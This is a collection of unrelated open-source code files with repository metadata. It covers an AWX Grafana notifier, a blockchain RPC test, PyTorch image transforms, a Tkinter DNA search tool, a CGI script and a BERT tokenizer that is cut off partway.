setup.py upload.""" description = 'Build and publish the package.' user_options = [] @staticmethod def status(s): """Prints things in bold.""" print('\033[1m{0}\033[0m'.format(s)) def initialize_options(self): pass def finalize_options(self): pass def run(self): try: self.status('Removing previous builds…') rmtree(os.path.join(here, 'dist')) except OSError: pass self.status('Building Source and Wheel (universal) distribution…') os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable)) self.status('Uploading the package to PyPI via Twine…') os.system('twine upload dist/*') self.status('Pushing git tags…') os.system('git tag v{0}'.format(about['__version__'])) os.system('git push --tags') sys.exit() # Where the magic happens: setup( name=NAME, version=about['__version__'], description=DESCRIPTION, long_description=long_description, long_description_content_type='text/markdown', author=AUTHOR, author_email=EMAIL, python_requires=REQUIRES_PYTHON, url=URL, packages=find_packages(exclude=('tests',)), # If your package is a single module, use this instead of 'packages': # py_modules=['mypackage'], # entry_points={ # 'console_scripts': ['mycli=mymodule:cli'], # }, install_requires=REQUIRED, extras_require=EXTRAS, include_package_data=True, license='MIT', classifiers=[ # Trove classifiers # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', ], # $ setup.py publish support. cmdclass={ 'upload': UploadCommand, }, )
27.517986
87
0.635033
0d7dff9e05a11b257e2d2d4b98a9b4030e9c24c4
5,246
py
Python
awx/main/notifications/grafana_backend.py
ziegenberg/awx
a3e29317c5d4220fffe28370ec73c73802255246
[ "Apache-2.0" ]
null
null
null
awx/main/notifications/grafana_backend.py
ziegenberg/awx
a3e29317c5d4220fffe28370ec73c73802255246
[ "Apache-2.0" ]
2
2022-02-10T11:57:21.000Z
2022-02-27T22:43:44.000Z
awx/main/notifications/grafana_backend.py
ziegenberg/awx
a3e29317c5d4220fffe28370ec73c73802255246
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2016 Ansible, Inc. # All Rights Reserved. import datetime import json import logging import requests import dateutil.parser as dp from django.utils.encoding import smart_str from django.utils.translation import gettext_lazy as _ from awx.main.notifications.base import AWXBaseEmailBackend from awx.main.notifications.custom_notification_base import CustomNotificationBase DEFAULT_MSG = CustomNotificationBase.DEFAULT_MSG DEFAULT_APPROVAL_RUNNING_MSG = CustomNotificationBase.DEFAULT_APPROVAL_RUNNING_MSG DEFAULT_APPROVAL_RUNNING_BODY = CustomNotificationBase.DEFAULT_APPROVAL_RUNNING_BODY DEFAULT_APPROVAL_APPROVED_MSG = CustomNotificationBase.DEFAULT_APPROVAL_APPROVED_MSG DEFAULT_APPROVAL_APPROVED_BODY = CustomNotificationBase.DEFAULT_APPROVAL_APPROVED_BODY DEFAULT_APPROVAL_TIMEOUT_MSG = CustomNotificationBase.DEFAULT_APPROVAL_TIMEOUT_MSG DEFAULT_APPROVAL_TIMEOUT_BODY = CustomNotificationBase.DEFAULT_APPROVAL_TIMEOUT_BODY DEFAULT_APPROVAL_DENIED_MSG = CustomNotificationBase.DEFAULT_APPROVAL_DENIED_MSG DEFAULT_APPROVAL_DENIED_BODY = CustomNotificationBase.DEFAULT_APPROVAL_DENIED_BODY logger = logging.getLogger('awx.main.notifications.grafana_backend') class GrafanaBackend(AWXBaseEmailBackend, CustomNotificationBase): init_parameters = {"grafana_url": {"label": "Grafana URL", "type": "string"}, "grafana_key": {"label": "Grafana API Key", "type": "password"}} recipient_parameter = "grafana_url" sender_parameter = None DEFAULT_BODY = "{{ job_metadata }}" default_messages = { "started": {"body": DEFAULT_BODY, "message": DEFAULT_MSG}, "success": {"body": DEFAULT_BODY, "message": DEFAULT_MSG}, "error": {"body": DEFAULT_BODY, "message": DEFAULT_MSG}, "workflow_approval": { "running": {"message": DEFAULT_APPROVAL_RUNNING_MSG, "body": DEFAULT_APPROVAL_RUNNING_BODY}, "approved": {"message": DEFAULT_APPROVAL_APPROVED_MSG, "body": DEFAULT_APPROVAL_APPROVED_BODY}, "timed_out": {"message": DEFAULT_APPROVAL_TIMEOUT_MSG, "body": DEFAULT_APPROVAL_TIMEOUT_BODY}, "denied": {"message": DEFAULT_APPROVAL_DENIED_MSG, "body": DEFAULT_APPROVAL_DENIED_BODY}, }, } def __init__( self, grafana_key, dashboardId=None, panelId=None, annotation_tags=None, grafana_no_verify_ssl=False, isRegion=True, fail_silently=False, **kwargs ): super(GrafanaBackend, self).__init__(fail_silently=fail_silently) self.grafana_key = grafana_key self.dashboardId = int(dashboardId) if dashboardId is not None else None self.panelId = int(panelId) if panelId is not None else None self.annotation_tags = annotation_tags if annotation_tags is not None else [] self.grafana_no_verify_ssl = grafana_no_verify_ssl self.isRegion = isRegion def format_body(self, body): # expect body to be a string representing a dict try: potential_body = json.loads(body) if isinstance(potential_body, dict): body = potential_body except json.JSONDecodeError: body = {} return body def send_messages(self, messages): sent_messages = 0 for m in messages: grafana_data = {} grafana_headers = {} if 'started' in m.body: try: epoch = datetime.datetime.utcfromtimestamp(0) grafana_data['time'] = grafana_data['timeEnd'] = int((dp.parse(m.body['started']).replace(tzinfo=None) - epoch).total_seconds() * 1000) if m.body.get('finished'): grafana_data['timeEnd'] = int((dp.parse(m.body['finished']).replace(tzinfo=None) - epoch).total_seconds() * 1000) except ValueError: logger.error(smart_str(_("Error converting time {} or timeEnd {} to int.").format(m.body['started'], m.body['finished']))) if not self.fail_silently: raise Exception(smart_str(_("Error converting time {} and/or timeEnd {} to int.").format(m.body['started'], m.body['finished']))) grafana_data['isRegion'] = self.isRegion if self.dashboardId is not None: grafana_data['dashboardId'] = self.dashboardId if self.panelId is not None: grafana_data['panelId'] = self.panelId if self.annotation_tags: grafana_data['tags'] = self.annotation_tags grafana_data['text'] = m.subject grafana_headers['Authorization'] = "Bearer {}".format(self.grafana_key) grafana_headers['Content-Type'] = "application/json" r = requests.post( "{}/api/annotations".format(m.recipients()[0]), json=grafana_data, headers=grafana_headers, verify=(not self.grafana_no_verify_ssl) ) if r.status_code >= 400: logger.error(smart_str(_("Error sending notification grafana: {}").format(r.status_code))) if not self.fail_silently: raise Exception(smart_str(_("Error sending notification grafana: {}").format(r.status_code))) sent_messages += 1 return sent_messages
49.028037
155
0.682234
894dd87fd23352ae4249a35a3c4032479c290306
1,292
py
Python
test/functional/rpcnamedargs.py
Exgibichi/statusquo
0a31913747fa09637cdaeadf009df75381e6efc4
[ "MIT" ]
null
null
null
test/functional/rpcnamedargs.py
Exgibichi/statusquo
0a31913747fa09637cdaeadf009df75381e6efc4
[ "MIT" ]
null
null
null
test/functional/rpcnamedargs.py
Exgibichi/statusquo
0a31913747fa09637cdaeadf009df75381e6efc4
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test using named arguments for RPCs.""" from test_framework.test_framework import StatusquoTestFramework from test_framework.util import ( assert_equal, assert_raises_jsonrpc, ) class NamedArgumentTest(StatusquoTestFramework): """ Test named arguments on RPC calls. """ def __init__(self): super().__init__() self.setup_clean_chain = False self.num_nodes = 1 def run_test(self): node = self.nodes[0] h = node.help(command='getinfo') assert(h.startswith('getinfo\n')) assert_raises_jsonrpc(-8, 'Unknown named parameter', node.help, random='getinfo') h = node.getblockhash(height=0) node.getblock(blockhash=h) assert_equal(node.echo(), []) assert_equal(node.echo(arg0=0,arg9=9), [0] + [None]*8 + [9]) assert_equal(node.echo(arg1=1), [None, 1]) assert_equal(node.echo(arg9=None), [None]*10) assert_equal(node.echo(arg0=0,arg3=3,arg9=9), [0] + [None]*2 + [3] + [None]*5 + [9]) if __name__ == '__main__': NamedArgumentTest().main()
30.761905
92
0.657121
2c393e83c6867ab3f6e38512c9d56c3a33b1f643
949
py
Python
test/test_topology_lib_subinterface.py
payalupadhyaya/topology_lib_subinterface
80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec
[ "Apache-2.0" ]
null
null
null
test/test_topology_lib_subinterface.py
payalupadhyaya/topology_lib_subinterface
80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec
[ "Apache-2.0" ]
null
null
null
test/test_topology_lib_subinterface.py
payalupadhyaya/topology_lib_subinterface
80ddd3d24ca0ff10c12ec6cd68dc3a8c5ec6c2ec
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (C) 2016 Hewlett Packard Enterprise Development LP # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """ Test suite for module topology_lib_subinterface. """ from __future__ import unicode_literals, absolute_import from __future__ import print_function, division # Add your test cases here. def test_your_test_case(): """ Document your test case here. """ print("test this test case) pass
27.911765
66
0.741834
cbf1e8dee92d101a9bcf56d360c0b18ae3a79a52
1,775
py
Python
dataset/utils.py
wolfib/proxy-nca
7166025081b98dfafa02ba5dc1288ce981b9367e
[ "MIT" ]
null
null
null
dataset/utils.py
wolfib/proxy-nca
7166025081b98dfafa02ba5dc1288ce981b9367e
[ "MIT" ]
null
null
null
dataset/utils.py
wolfib/proxy-nca
7166025081b98dfafa02ba5dc1288ce981b9367e
[ "MIT" ]
null
null
null
from torchvision import transforms import PIL.Image import torch def std_per_channel(images): images = torch.stack(images, dim = 0) return images.view(3, -1).std(dim = 1) def mean_per_channel(images): images = torch.stack(images, dim = 0) return images.view(3, -1).mean(dim = 1) class Identity(): # used for skipping transforms def __call__(self, im): return im class ScaleIntensities(): def __init__(self, in_range, out_range): """ Scales intensities. For example [-1, 1] -> [0, 255].""" self.in_range = in_range self.out_range = out_range def __call__(self, tensor): tensor = ( tensor - self.in_range[0] ) / ( self.in_range[1] - self.in_range[0] ) * ( self.out_range[1] - self.out_range[0] ) + self.out_range[0] return tensor def make_transform(sz_resize = 256, sz_crop = 227, mean = [128, 117, 104], std = [1, 1, 1], rgb_to_bgr = True, is_train = True, intensity_scale = [[0, 1], [0, 255]]): return transforms.Compose([ transforms.Compose([ # train: horizontal flip and random resized crop transforms.RandomResizedCrop(sz_crop), transforms.RandomHorizontalFlip(), ]) if is_train else transforms.Compose([ # test: else center crop transforms.Resize(sz_resize), transforms.CenterCrop(sz_crop), ]), transforms.ToTensor(), ScaleIntensities( *intensity_scale) if intensity_scale is not None else Identity(), transforms.Normalize( mean=mean, std=std, ), transforms.Lambda( lambda x: x[[2, 1, 0], ...] ) if rgb_to_bgr else Identity() ])
29.098361
77
0.588732
e9f6b6c744f2841c65955a490697e99665544cb6
33
py
Python
venus/db/dbo/adapter/__init__.py
nagylzs/python-venus-lib
336d20532c32e874ab0a43cf866092b9e55dded5
[ "Apache-2.0" ]
null
null
null
venus/db/dbo/adapter/__init__.py
nagylzs/python-venus-lib
336d20532c32e874ab0a43cf866092b9e55dded5
[ "Apache-2.0" ]
1
2019-02-15T13:40:49.000Z
2019-02-15T13:40:49.000Z
venus/db/dbo/adapter/__init__.py
nagylzs/python-venus-lib
336d20532c32e874ab0a43cf866092b9e55dded5
[ "Apache-2.0" ]
null
null
null
"""Database adapters package."""
16.5
32
0.69697
38b6fc9243373b4563b87ae2eb886f68c67f81b3
274
py
Python
problems/remove_element/solution.py
nagahshi/LeetCodeProblems_Repository
ed9831141fdd6ca432acb25318ef5afdb3a7fd3a
[ "MIT" ]
null
null
null
problems/remove_element/solution.py
nagahshi/LeetCodeProblems_Repository
ed9831141fdd6ca432acb25318ef5afdb3a7fd3a
[ "MIT" ]
null
null
null
problems/remove_element/solution.py
nagahshi/LeetCodeProblems_Repository
ed9831141fdd6ca432acb25318ef5afdb3a7fd3a
[ "MIT" ]
null
null
null
class Solution(object): def removeElement(self, nums: List[int], val: int) -> int: """ :type nums: list :type val: int :rtype: int (size of num) """ while val in nums: nums.remove(val) return len(nums)
27.4
62
0.50365
38380a24448b26b5a31f3dcdef75bf92e9def696
1,844
py
Python
cgi-bin/passmots/salvaOrigemRegistro.py
wsampaio/multi_agenda_py
72c9cf4d8b26827a9eba6de3119e63464d312aea
[ "CC-BY-4.0" ]
null
null
null
cgi-bin/passmots/salvaOrigemRegistro.py
wsampaio/multi_agenda_py
72c9cf4d8b26827a9eba6de3119e63464d312aea
[ "CC-BY-4.0" ]
null
null
null
cgi-bin/passmots/salvaOrigemRegistro.py
wsampaio/multi_agenda_py
72c9cf4d8b26827a9eba6de3119e63464d312aea
[ "CC-BY-4.0" ]
null
null
null
#!/usr/bin/env python3 # # Este arquivo é parte do programa multi_agenda # # Esta obra está licenciada com uma # Licença Creative Commons Atribuição 4.0 Internacional. # (CC BY 4.0 Internacional) # # Para ver uma cópia da licença, visite # https://creativecommons.org/licenses/by/4.0/legalcode # # WELLINGTON SAMPAIO - wsampaio@yahoo.com # https://www.linkedin.com/in/wellsampaio/ # import sys import cgi from os.path import dirname, realpath, sep, pardir sys.path.append((dirname(realpath(__file__)) + sep + pardir)) import cgitb cgitb.enable() from objetos.passmots.OrigemRegistro import OrigemRegistro from objetos.passmots.OrigemRegistroDAO import OrigemRegistroDAO codOrigemRegistro = 0 form = cgi.FieldStorage() origemRegistro = OrigemRegistro() origemRegistroDAO = OrigemRegistroDAO() if str(form) != "FieldStorage(None, None, '')": codOrigemRegistro = int(form.getvalue("codOrigemRegistro")) if form.getvalue("codOrigemRegistro"): origemRegistro.setCodOrigemRegistro(int(form.getvalue("codOrigemRegistro"))) if form.getvalue("origemRegistro"): origemRegistro.setOrigemRegistro(str(form.getvalue("origemRegistro"))) if codOrigemRegistro > 0: if form.getvalue("delete"): origemRegistroDAO.delete(origemRegistro.getCodOrigemRegistro()) else: origemRegistroDAO.update(origemRegistro) else: origemRegistroDAO.insert(origemRegistro) else: #tentando enviar status de erro #header("HTTP/1.0 404 Not Found"); #print "Status: 404 Not Found\r\n" #print "Content-Type: text/html\r\n\r\n" #print "Status: 400 Bad Request\r\n" pass #print("Content-type: text/html\n") #print("Content-type: application/json\n") #print("form = " + str(form)) #print("codHistorico = " + str(codHistorico)) if form.getvalue("delete"): print("DELETE") else: print("não delete") print(""" Dados Salvos """)
20.719101
78
0.743492
22c5e29803815291c40cae37e56aea0fb333e1fc
355
py
Python
project/editorial/migrations/0015_remove_videoasset_embed.py
cojennin/facet
230e65316134b3399a35d40034728e61ba63cb2a
[ "MIT" ]
25
2015-07-13T22:16:36.000Z
2021-11-11T02:45:32.000Z
project/editorial/migrations/0015_remove_videoasset_embed.py
cojennin/facet
230e65316134b3399a35d40034728e61ba63cb2a
[ "MIT" ]
74
2015-12-01T18:57:47.000Z
2022-03-11T23:25:47.000Z
project/editorial/migrations/0015_remove_videoasset_embed.py
cojennin/facet
230e65316134b3399a35d40034728e61ba63cb2a
[ "MIT" ]
6
2016-01-08T21:12:43.000Z
2019-05-20T16:07:56.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('editorial', '0014_videoasset_embed'), ] operations = [ migrations.RemoveField( model_name='videoasset', name='embed', ), ]
18.684211
47
0.605634
15c140aa69963c538a5e1891ea45929940c8e9ad
6,268
py
Python
Scripts/xbbtools/xbb_search.py
mikepm35/biopython
9f2d4d8d70ec7223df35fdc3d9c4a3c018756327
[ "BSD-3-Clause" ]
1
2020-02-13T14:32:44.000Z
2020-02-13T14:32:44.000Z
Scripts/xbbtools/xbb_search.py
EsamTolba/biopython
120616cf0d28cb8e581898afd6604e5a2065a137
[ "BSD-3-Clause" ]
null
null
null
Scripts/xbbtools/xbb_search.py
EsamTolba/biopython
120616cf0d28cb8e581898afd6604e5a2065a137
[ "BSD-3-Clause" ]
1
2019-03-14T18:59:30.000Z
2019-03-14T18:59:30.000Z
#!/usr/bin/env python # Copyright 2000 by Thomas Sicheritz-Ponten. # Copyrigth 2016 by Markus Piotrowski. # All rights reserved. # This code is part of the Biopython distribution and governed by its # license. Please see the LICENSE file that should have been included # as part of this package. # Created: Sun Dec 3 13:38:52 2000 # thomas@cbs.dtu.dk, http://www.cbs.dtu.dk/thomas """Search code for graphical Xbbtools tool.""" import re try: # Python 2 import Tkinter as tk import ttk import tkColorChooser as colorchooser except ImportError: # Python 3 import tkinter as tk import tkinter.ttk as ttk from tkinter import colorchooser from Bio.Data.IUPACData import ambiguous_dna_values from Bio.Seq import reverse_complement import xbb_widget class DNAsearch(object): """Class to search a DNA sequence.""" def __init__(self): """Set up the alphabet.""" self.init_alphabet() self.sequence = '' def init_alphabet(self): """Expand alphabet values for ambiguous codes.""" self.alphabet = ambiguous_dna_values other = ''.join(self.alphabet) self.alphabet['N'] = self.alphabet['N'] + other for key in self.alphabet: if key == 'N': continue if key in self.alphabet[key]: continue self.alphabet[key] = self.alphabet[key] + key def SetSeq(self, seq): """Set sequence.""" self.sequence = seq def SetPattern(self, pattern): """Convert search pattern to regular expression.""" self.pattern = pattern self.rx_pattern = self.IUPAC2regex(pattern) self.rx = re.compile(self.rx_pattern) def IUPAC2regex(self, s): """Translate search text into pattern.""" rx = '' for i in s: r = self.alphabet.get(i, i) if len(r) > 1: rx = '%s[%s]' % (rx, r) else: rx += r return rx def _Search(self, start=0): """Search and return MatchObject (PRIVAT).""" # Only called from SearchAll. Is it used? pos = self.rx.search(self.sequence, start) return pos def Search(self, start=0): """Search for query sequence and return position.""" pos = self.rx.search(self.sequence, start) if pos: return pos.start() else: return -1 def SearchAll(self): """Search the whole sequence.""" # Doesn't seem to be used... pos = -1 positions = [] while True: m = self._Search(pos + 1) if not m: break pos = m.start() if pos == -1: break positions.append(pos) return positions class XDNAsearch(tk.Toplevel, DNAsearch): """Graphical tools to perform the DNA search.""" def __init__(self, seq='', master=None, highlight=0): """Initialize the search GUI.""" DNAsearch.__init__(self) self.master = master self.highlight = highlight self.colors = [] self.init_graphics() self.sequence = seq self.cur_pos = 0 def init_graphics(self): """Build the search window.""" tk.Toplevel.__init__(self, self.master) self.frame = ttk.Frame(self) self.frame.pack(fill=tk.BOTH, expand=1) self.search_entry = ttk.Entry(self.frame) self.search_entry.pack(fill=tk.BOTH, expand=1) f2 = ttk.Frame(self.frame) f2.pack(side=tk.TOP, fill=tk.BOTH, expand=1) f = f2 self.forward = ttk.Button(f, text='Search +', command=self.do_search) self.forward.pack(side=tk.LEFT) self.forward = ttk.Button( f, text='Search -', command=lambda x=self.do_search: x(other_strand=1)) self.forward.pack(side=tk.LEFT) self.cancel = ttk.Button(f, text='Cancel', command=self.exit) self.cancel.pack(side=tk.LEFT) self.current_color = 'cyan' self.colorb = ttk.Button(f, text='Color', command=self.change_color) self.colorb.pack(side=tk.LEFT) self.config_color(self.current_color) def config_color(self, color=None): """Set color for found sequence tag.""" if not self.highlight: return if not color: color = colorchooser.askcolor()[1] if not color: color = 'cyan' self.current_color = color self.current_tag = 'searched_%s' % self.current_color self.master.tag_config(self.current_tag, background=self.current_color) self.master.tag_config(self.current_tag + 'R', background=self.current_color, underline=1) self.colors.append(color) def change_color(self): """Call back for color button.""" self.config_color() def get_pattern(self): """Retrieve query sequence.""" pattern = self.search_entry.get() return pattern def do_search(self, other_strand=0): """Start the search.""" pattern = self.get_pattern() if other_strand: pattern = reverse_complement(pattern) self.SetPattern(pattern) pos = self.Search(self.cur_pos) self.cur_pos = pos + 1 w = self.master if pos != -1: if self.highlight: start, stop = pos, pos + len(self.pattern) if other_strand: w.tag_add(self.current_tag + 'R', '1.%d' % start, '1.%s' % stop) else: w.tag_add(self.current_tag, '1.%d' % start, '1.%s' % stop) w.see('1.%d' % start) def exit(self): """Clean up on exit.""" for c in self.colors: self.master.tag_remove('searched_%s' % c, 1.0, tk.END) self.master.tag_remove('searched_%sR' % c, 1.0, tk.END) self.destroy() del(self) if __name__ == '__main__': win = tk.Tk() xbbtools = xbb_widget.xbb_widget() seq = 'ATGGTGTGTGTGTACGATCGCCCCCCCCAGTCGATCGATGCATCGTA' xbbtools.insert_sequence(('Test_seq', seq)) xbbtools.search() win.mainloop()
30.72549
79
0.575463
75d479b2e671da56a4ab026019d9566aaadd7f37
21,129
py
Python
projects/QQP/tokenizer/bert_tokenization.py
Oneflow-Inc/libai
e473bd3962f07b1e37232d2be39c8257df0ec0f3
[ "Apache-2.0" ]
55
2021-12-10T08:47:06.000Z
2022-03-28T09:02:15.000Z
projects/QQP/tokenizer/bert_tokenization.py
Oneflow-Inc/libai
e473bd3962f07b1e37232d2be39c8257df0ec0f3
[ "Apache-2.0" ]
106
2021-11-03T05:16:45.000Z
2022-03-31T06:16:23.000Z
projects/QQP/tokenizer/bert_tokenization.py
Oneflow-Inc/libai
e473bd3962f07b1e37232d2be39c8257df0ec0f3
[ "Apache-2.0" ]
13
2021-12-29T08:12:08.000Z
2022-03-28T06:59:45.000Z
# coding=utf-8 # Copyright 2018 The Google AI Language Team Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tokenization classes.""" import collections import re import sys import unicodedata import six is_python3 = sys.version_info.major == 3 if is_python3: unicode = str def validate_case_matches_checkpoint(do_lower_case, init_checkpoint): """Checks whether the casing config is consistent with the checkpoint name.""" # The casing has to be passed in by the user and there is no explicit check # as to whether it matches the checkpoint. The casing information probably # should have been stored in the bert_config.json file, but it's not, so # we have to heuristically detect it to validate. if not init_checkpoint: return m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint) if m is None: return model_name = m.group(1) lower_models = [ "uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12", "multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12", ] cased_models = [ "cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16", "multi_cased_L-12_H-768_A-12", ] is_bad_config = False if model_name in lower_models and not do_lower_case: is_bad_config = True actual_flag = "False" case_name = "lowercased" opposite_flag = "True" if model_name in cased_models and do_lower_case: is_bad_config = True actual_flag = "True" case_name = "cased" opposite_flag = "False" if is_bad_config: raise ValueError( "You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. " "However, `%s` seems to be a %s model, so you " "should pass in `--do_lower_case=%s` so that the fine-tuning matches " "how the model was pre-training. If this error is wrong, please " "just comment out this check." % (actual_flag, init_checkpoint, model_name, case_name, opposite_flag) ) def convert_to_unicode(text): """Converts `text` to Unicode (if it's not already), assuming utf-8 input.""" if six.PY3: if isinstance(text, str): return text elif isinstance(text, bytes): return text.decode("utf-8", "ignore") else: raise ValueError("Unsupported string type: %s" % (type(text))) elif six.PY2: if isinstance(text, str): return text.decode("utf-8", "ignore") elif isinstance(text, unicode): return text else: raise ValueError("Unsupported string type: %s" % (type(text))) else: raise ValueError("Not running on Python2 or Python 3?") def printable_text(text): """Returns text encoded in a way suitable for print or `tf.logging`.""" # These functions want `str` for both Python2 and Python3, but in one case # it's a Unicode string and in the other it's a byte string. if six.PY3: if isinstance(text, str): return text elif isinstance(text, bytes): return text.decode("utf-8", "ignore") else: raise ValueError("Unsupported string type: %s" % (type(text))) elif six.PY2: if isinstance(text, str): return text elif isinstance(text, unicode): return text.encode("utf-8") else: raise ValueError("Unsupported string type: %s" % (type(text))) else: raise ValueError("Not running on Python2 or Python 3?") def load_vocab(vocab_file): """Loads a vocabulary file into a dictionary.""" vocab = collections.OrderedDict() index = 0 with open(vocab_file, "r", encoding="utf-8") as reader: while True: token = convert_to_unicode(reader.readline()) if not token: break token = token.strip() vocab[token] = index index += 1 return vocab def convert_by_vocab(vocab, items, inv=False): """Converts a sequence of [tokens|ids] using the vocab.。""" output = [] for item in items: if not inv: if _is_chinese_substr(item): output.append(vocab[item[2:]] + len(vocab)) else: output.append(vocab[item]) else: if item > len(vocab): output.append("##" + vocab[item - len(vocab)]) else: output.append(vocab[item]) return output def convert_tokens_to_ids(vocab, tokens): return convert_by_vocab(vocab, tokens) def convert_ids_to_tokens(inv_vocab, ids): return convert_by_vocab(inv_vocab, ids, inv=True) def whitespace_tokenize(text): """Runs basic whitespace cleaning and splitting on a piece of text.""" text = text.strip() if not text: return [] tokens = text.split() return tokens class FullTokenizer(object): """Runs end-to-end tokenziation.""" def __init__(self, vocab_file, do_lower_case=True, do_chinese_wwm=False): self.vocab = load_vocab(vocab_file) # _BertTokenizer会增加[BOS]和[EOS] self.inv_vocab = {v: k for k, v in self.vocab.items()} if not do_chinese_wwm: self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case) else: self.basic_tokenizer = BasicTokenizerWithChineseWWM(do_lower_case) self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab) def tokenize(self, text): split_tokens = [] for token in self.basic_tokenizer.tokenize(text): for sub_token in self.wordpiece_tokenizer.tokenize(token): split_tokens.append(sub_token) return split_tokens def convert_tokens_to_ids(self, tokens): return convert_by_vocab(self.vocab, tokens) def convert_ids_to_tokens(self, ids): return convert_by_vocab(self.inv_vocab, ids, inv=True) @staticmethod def convert_tokens_to_string(tokens, clean_up_tokenization_spaces=True): """Converts a sequence of tokens (string) to a single string.""" def clean_up_tokenization(out_string): """Clean up a list of simple English tokenization artifacts like spaces before punctuations and abreviated forms. """ out_string = ( out_string.replace(" .", ".") .replace(" ?", "?") .replace(" !", "!") .replace(" ,", ",") .replace(" ' ", "'") .replace(" n't", "n't") .replace(" 'm", "'m") .replace(" 's", "'s") .replace(" 've", "'ve") .replace(" 're", "'re") ) return out_string text = " ".join(tokens).replace(" ##", "").strip() if clean_up_tokenization_spaces: clean_text = clean_up_tokenization(text) return clean_text else: return text def vocab_size(self): return len(self.vocab) class BasicTokenizer(object): """Runs basic tokenization (punctuation splitting, lower casing, etc.).""" def __init__(self, do_lower_case=True): """Constructs a BasicTokenizer. Args: do_lower_case: Whether to lower case the input. """ self.do_lower_case = do_lower_case def tokenize(self, text): """Tokenizes a piece of text.""" text = convert_to_unicode(text) text = self._clean_text(text) # This was added on November 1st, 2018 for the multilingual and Chinese # models. This is also applied to the English models now, but it doesn't # matter since the English models were not trained on any Chinese data # and generally don't have any Chinese data in them (there are Chinese # characters in the vocabulary because Wikipedia does have some Chinese # words in the English Wikipedia.). text = self._tokenize_chinese_chars(text) orig_tokens = whitespace_tokenize(text) split_tokens = [] for token in orig_tokens: if self.do_lower_case: token = token.lower() token = self._run_strip_accents(token) split_tokens.extend(self._run_split_on_punc(token)) output_tokens = whitespace_tokenize(" ".join(split_tokens)) return output_tokens def _run_strip_accents(self, text): """Strips accents from a piece of text.""" text = unicodedata.normalize("NFD", text) output = [] for char in text: cat = unicodedata.category(char) if cat == "Mn": continue output.append(char) return "".join(output) def _run_split_on_punc(self, text): """Splits punctuation on a piece of text.""" chars = list(text) i = 0 start_new_word = True output = [] while i < len(chars): char = chars[i] if _is_punctuation(char): output.append([char]) start_new_word = True else: if start_new_word: output.append([]) start_new_word = False output[-1].append(char) i += 1 return ["".join(x) for x in output] def _tokenize_chinese_chars(self, text): """Adds whitespace around any CJK character.""" output = [] for char in text: cp = ord(char) if self._is_chinese_char(cp): output.append(" ") output.append(char) output.append(" ") else: output.append(char) return "".join(output) def _is_chinese_char(self, cp): """Checks whether CP is the codepoint of a CJK character.""" # This defines a "chinese character" as anything in the CJK Unicode block: # https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block) # # Note that the CJK Unicode block is NOT all Japanese and Korean characters, # despite its name. The modern Korean Hangul alphabet is a different block, # as is Japanese Hiragana and Katakana. Those alphabets are used to write # space-separated words, so they are not treated specially and handled # like the all of the other languages. if ( (cp >= 0x4E00 and cp <= 0x9FFF) or (cp >= 0x3400 and cp <= 0x4DBF) # or (cp >= 0x20000 and cp <= 0x2A6DF) # or (cp >= 0x2A700 and cp <= 0x2B73F) # or (cp >= 0x2B740 and cp <= 0x2B81F) # or (cp >= 0x2B820 and cp <= 0x2CEAF) # or (cp >= 0xF900 and cp <= 0xFAFF) or (cp >= 0x2F800 and cp <= 0x2FA1F) # ): # return True return False def _clean_text(self, text): """Performs invalid character removal and whitespace cleanup on text.""" output = [] for char in text: cp = ord(char) if cp == 0 or cp == 0xFFFD or _is_control(char): continue if _is_whitespace(char): output.append(" ") else: output.append(char) return "".join(output) class WordpieceTokenizer(object): """Runs WordPiece tokenziation.""" def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200): self.vocab = vocab self.unk_token = unk_token self.max_input_chars_per_word = max_input_chars_per_word def tokenize(self, text): """Tokenizes a piece of text into its word pieces. This uses a greedy longest-match-first algorithm to perform tokenization using the given vocabulary. For example: input = "unaffable" output = ["un", "##aff", "##able"] input = "有没有" output = ["有", "##没", "##有"] (NickPan)对中文的特殊处理: 中文的substr和原字不应该用不同的embedding,因此"有"和"##有"应该要用同样的id, 考虑到有些中文词表中本身带有中文substr,有些则没有(如bert4kreas),为了兼容 两种情况,这里统一的处理方式是将中文substr的id设置为vocab_size+id(substr.remove(##)), 然后在构建样本mask的时候再考虑。因此在wordpiece_tokenize时,不需要考虑"##有"是否在词表中, 只需要考虑"有"在词表中即可。 Args: text: A single token or whitespace separated tokens. This should have already been passed through `BasicTokenizer. Returns: A list of wordpiece tokens. """ text = convert_to_unicode(text) output_tokens = [] for token in whitespace_tokenize(text): chars = list(token) if len(chars) > self.max_input_chars_per_word: output_tokens.append(self.unk_token) continue is_bad = False start = 0 sub_tokens = [] while start < len(chars): end = len(chars) cur_substr = None while start < end: substr = 